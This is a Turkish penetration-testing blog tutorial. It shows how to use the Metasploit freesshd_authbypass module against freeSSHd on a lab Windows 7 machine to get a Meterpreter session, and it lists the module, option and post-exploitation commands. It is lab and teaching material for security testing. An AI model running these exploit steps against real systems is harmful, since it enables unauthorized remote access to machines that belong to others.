MSF freesshd_authbypass İstismar Modülü ile Uygulama Zafiyetinin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda, Windows 7 SP1 işletim sisteminde freeSSHd uygulamasına ait zafiyetinin Metasploit Framework ile istismar edilecek ve kullanıcı hakları ile Meterpreter bağlantısı elde edilecektir.

Yazıda özel olarak hazırlanmış bir Windows 7 bilgisayar kullanılmıştır. Bunun yerine hazır sanal makineler de kullanılabilir. Örneğin, /dev/random: scream sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/devrandom-scream,47/

freeSSHd uygulaması, güvenilir veri transferi amacıyla kullanılan bir uygulamadır. Bu uygulamadaki anahtar değişimi algoritmasından kaynaklı bellek taşması zafiyeti MSF freesshd_authbypass istismar modülü ile kötüye kullanılarak işletim sistemine Meterpreter bağlantısı elde edilebilir. Eğer kullanıcı adı kolay ve tahmin edilebilir bir şekilde bırakılırsa, parolaya ihtyaç duyulmadan kimlik doğrulaması sağlanır.

acquiring-meterpreter-shell-on-windows-by-using-msf-freesshd-authbypass-exploit-module-01

Metasploit üzerinde ilgili modülün seçenekleri aşağıdaki gibidir:

search freesshd
use exploit/windows/ssh/freesshd_authbypass
show options

acquiring-meterpreter-shell-on-windows-by-using-msf-freesshd-authbypass-exploit-module-02

Seçenek olarak hedef IP adresinin ayarlanması yeterlidir.

set RHOST 10.3.0.142
show options

acquiring-meterpreter-shell-on-windows-by-using-msf-freesshd-authbypass-exploit-module-03

Seçenekler ayarlandıktan sonra modül çalıştırılabilir. Modül çalıştırıldığında uygulamayı çalıştıran kullanıcı haklarıyla Meterpreter bağlantısının elde edildiği görülmektedir.

exploit
getuid
getpid
ps -u Yonetici

acquiring-meterpreter-shell-on-windows-by-using-msf-freesshd-authbypass-exploit-module-04

 

Benzer olarak TFTP üzerinden de istismar gerçekleştirilebilirdi.

 

Kaynak:

http://paulsec.github.io/blog/2014/04/16/scream-write-up/
https://www.youtube.com/watch?v=aJktFdwhixY

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.